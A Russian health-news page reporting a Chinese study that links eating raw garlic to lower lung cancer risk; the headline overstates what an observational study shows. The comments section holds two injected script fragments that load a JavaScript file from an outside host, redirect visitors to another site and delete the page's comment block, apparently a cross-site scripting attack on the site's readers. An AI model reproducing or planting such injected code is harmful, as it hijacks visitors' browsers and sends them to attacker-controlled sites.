Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чеснок спасет вас от рака...  >>  Чеснок спасет вас от рака легких
 
Обратная связь
 

Чеснок спасет вас от рака легких

Размер шрифта
15 октября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Появился еще один повод добавлять чеснок в блюда. Ученые выяснили, что эта пахучая специя снижает риск развития рака легких на 44%!

Чеснок спасет вас от рака легких

Каждый год в нашей стране диагностируются десятки тысяч случаев рака легкого, одного из самых смертоносных злокачественных заболеваний. Примерно 80% случаев связано с курением. Прогноз этой болезни крайне неблагоприятен: по статистике, пять лет с момента постановки диагноза проживет менее одного пациента из десяти.

Китайские ученые из города Цзянсу решили изучить связь между употреблением чеснока и раком легких. Они сравнили две группы испытуемых: здоровых добровольцев (4 500 человек) и пациентов с диагностированным раком (1 424 пациента). Все они были опрошены на предмет их кулинарных предпочтений и образа жизни. В частности: в каком количестве и как часто они употребляли чеснок и страдали ли они от никотиновой зависимости.

Выяснилось, что у лиц, которые кушали сырой чеснок как минимум два раза в неделю, значительно (на 44%) снижался риск развития рака легкого. Более того: риск уменьшается даже у заядлых курильщиков, которые по умолчанию составляют основной контингент пациентов с этим заболеванием. Правда, цифра в этом случае чуть менее впечатляющая (30%).

Обладает ли аналогичным эффектом приготовленный чеснок, пока неизвестно. Также неясен механизм, по которому реализуется эта противоопухолевая активность. Ученые предполагают, что в роли чудесной молекулы, которая борется с раком, может выступать аллицин – один из ключевых компонентов чеснока, который обладает достоверно изученными противовоспалительными и антиоксидантными свойствами.

В любом случае, ешьте чеснок и не бойтесь неприятного запаха – он замечательно устраняется, если одновременно выпить стакан молока.

Результаты данного исследования были опубликованы в онлайн-издании «Профилактика рака» (Cancer Prevention Research).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Этот овощ снижает риск рака наполовину!   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Бронхит: лицом к лицу
Еда против рака. Часть 2
Еда против рака. Часть 1

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.